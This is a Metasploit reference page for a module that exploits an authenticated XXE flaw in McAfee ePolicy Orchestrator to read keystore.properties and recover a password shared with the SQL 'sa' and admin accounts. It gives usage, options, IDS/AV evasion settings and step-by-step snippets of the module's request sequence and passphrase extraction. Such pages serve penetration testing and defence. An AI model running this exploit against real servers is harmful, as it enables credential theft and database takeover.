McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure - Metasploit


This page contains detailed information about how to use the auxiliary/gather/mcafee_epo_xxe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure
Module: auxiliary/gather/mcafee_epo_xxe
Source code: modules/auxiliary/gather/mcafee_epo_xxe.rb
Disclosure date: 2015-01-06
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2015-0921, CVE-2015-0922

This module will exploit an authenticated XXE vulnerability to read the keystore.properties off of the filesystem. This properties file contains an encrypted password that is set during installation. What is interesting about this password is that it is set as the same password as the database 'sa' user and of the admin user created during installation. This password is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default, if installed with a local SQL Server instance, the SQL Server is listening on all interfaces. Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server user in order to achieve remote command execution with permissions of the database process. If the administrator has not changed the password for the initially created account since installation, the attacker will have the password for this account. By default, 'admin' is recommended. Any user account can be used to exploit this, all that is needed is a valid credential. The most data that can be successfully retrieved is 255 characters due to length restrictions on the field used to perform the XXE attack.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/mcafee_epo_xxe
msf auxiliary(mcafee_epo_xxe) > show targets
    ... a list of targets ...
msf auxiliary(mcafee_epo_xxe) > set TARGET target-id
msf auxiliary(mcafee_epo_xxe) > show options
    ... show and set options ...
msf auxiliary(mcafee_epo_xxe) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the gather/mcafee_epo_xxe auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/mcafee_epo_xxe

msf6 auxiliary(gather/mcafee_epo_xxe) > show info

       Name: McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure
     Module: auxiliary/gather/mcafee_epo_xxe
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-01-06

Provided by:
  Brandon Perry <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   password         yes       The password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8443             yes       The target port (TCP)
  SSL        true             yes       Use SSL
  TARGETURI  /                yes       Base ePO directory path
  USERNAME   username         yes       The username to authenticate with
  VHOST                       no        HTTP server virtual host

Description:
  This module will exploit an authenticated XXE vulnerability to read 
  the keystore.properties off of the filesystem. This properties file 
  contains an encrypted password that is set during installation. What 
  is interesting about this password is that it is set as the same 
  password as the database 'sa' user and of the admin user created 
  during installation. This password is encrypted with a static key, 
  and is encrypted using a weak cipher (ECB). By default, if installed 
  with a local SQL Server instance, the SQL Server is listening on all 
  interfaces. Recovering this password allows an attacker to 
  potentially authenticate as the 'sa' SQL Server user in order to 
  achieve remote command execution with permissions of the database 
  process. If the administrator has not changed the password for the 
  initially created account since installation, the attacker will have 
  the password for this account. By default, 'admin' is recommended. 
  Any user account can be used to exploit this, all that is needed is 
  a valid credential. The most data that can be successfully retrieved 
  is 255 characters due to length restrictions on the field used to 
  perform the XXE attack.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-0921
  https://nvd.nist.gov/vuln/detail/CVE-2015-0922
  https://seclists.org/fulldisclosure/2015/Jan/8

Module Options


This is a complete list of options available in the gather/mcafee_epo_xxe auxiliary module:

msf6 auxiliary(gather/mcafee_epo_xxe) > show options

Module options (auxiliary/gather/mcafee_epo_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       Base ePO directory path
   USERNAME   username         yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/mcafee_epo_xxe auxiliary module:

msf6 auxiliary(gather/mcafee_epo_xxe) > show advanced

Module advanced options (auxiliary/gather/mcafee_epo_xxe):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/mcafee_epo_xxe module can do:

msf6 auxiliary(gather/mcafee_epo_xxe) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/mcafee_epo_xxe auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/mcafee_epo_xxe) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

64:	    res = send_request_cgi({
65:	      'uri' => normalize_uri(target_uri.path, 'core', 'orionSplashScreen.do')
66:	    })
67:	
68:	    unless res
69:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
70:	    end
71:	
72:	    cookie = res.get_cookies
73:	
74:	    res = send_request_cgi({

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

80:	      },
81:	      'cookie' => cookie
82:	    })
83:	
84:	    unless res
85:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
86:	    end
87:	
88:	    cookie = res.get_cookies
89:	
90:	    res = send_request_cgi({

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

91:	      'uri' => normalize_uri(target_uri.path, 'core', 'orionSplashScreen.do'),
92:	      'cookie' => cookie
93:	    })
94:	
95:	    unless res
96:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
97:	    end
98:	
99:	    if res.code != 302
100:	      fail_with(Failure::Unknown, 'Authentication failed')
101:	    end

Authentication failed


Here is a relevant code snippet related to the "Authentication failed" error message:

95:	    unless res
96:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
97:	    end
98:	
99:	    if res.code != 302
100:	      fail_with(Failure::Unknown, 'Authentication failed')
101:	    end
102:	
103:	    cookie = res.get_cookies
104:	
105:	    #This vuln requires a bit of setup before we can exploit it

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

110:	      'uri' => normalize_uri(target_uri.path, 'core', 'orionNavigationLogin.do'),
111:	      'cookie' => cookie
112:	    })
113:	
114:	    unless res
115:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
116:	    end
117:	
118:	    auth_token = $1 if res.body =~ /id="orion.user.security.token" value="(.*)"\/>/
119:	
120:	    res = send_request_cgi({

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

126:	      },
127:	      'cookie' => cookie
128:	    })
129:	
130:	    unless res
131:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
132:	    end
133:	
134:	    res = send_request_cgi({
135:	      'uri' => normalize_uri(target_uri.path, 'core', 'loadTableData.do'),
136:	      'vars_get' => {

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

145:	      },
146:	      'cookie' => cookie
147:	    })
148:	
149:	    unless res
150:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
151:	    end
152:	
153:	    res = send_request_cgi({
154:	      'uri' => normalize_uri(target_uri.path, 'core', 'orionEditTableFilter.do'),
155:	      'vars_get' => {

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

159:	      },
160:	      'cookie' => cookie
161:	    })
162:	
163:	    unless res
164:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
165:	    end
166:	
167:	    res = send_request_cgi({
168:	      'uri' => normalize_uri(target_uri.path, 'core', 'orionTableUpdateState.do'),
169:	      'method' => 'POST',

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

180:	      },
181:	      'cookie' => cookie
182:	    })
183:	
184:	    unless res
185:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
186:	    end
187:	
188:	    res = send_request_cgi({
189:	      'uri' => normalize_uri(target_uri.path, 'core', 'loadDisplayType.do'),
190:	      'method' => 'POST',

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

218:	      },
219:	      'cookie' => cookie
220:	    })
221:	
222:	    unless res
223:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
224:	    end
225:	
226:	    if res.code == 404
227:	      fail_with(Failure::Unknown, "Server likely has mitigation in place")
228:	    end

Server likely has mitigation in place


Here is a relevant code snippet related to the "Server likely has mitigation in place" error message:

222:	    unless res
223:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
224:	    end
225:	
226:	    if res.code == 404
227:	      fail_with(Failure::Unknown, "Server likely has mitigation in place")
228:	    end
229:	
230:	    print_status("Getting encrypted passphrase value from keystore.properties file...")
231:	
232:	    res = send_request_cgi({

Server did not respond in an expected way


Here is a relevant code snippet related to the "Server did not respond in an expected way" error message:

238:	      },
239:	      'cookie' => cookie
240:	    })
241:	
242:	    unless res
243:	      fail_with(Failure::Unknown, "Server did not respond in an expected way")
244:	    end
245:	
246:	    passphrase = $1 if res.body =~ /passphrase=(.*?)\\u003/
247:	
248:	    passphrase = passphrase.gsub('\\\\=', '=').gsub("\\u002f", "/").gsub("\\u002b", "+")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Brandon Perry <bperry.volatile[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.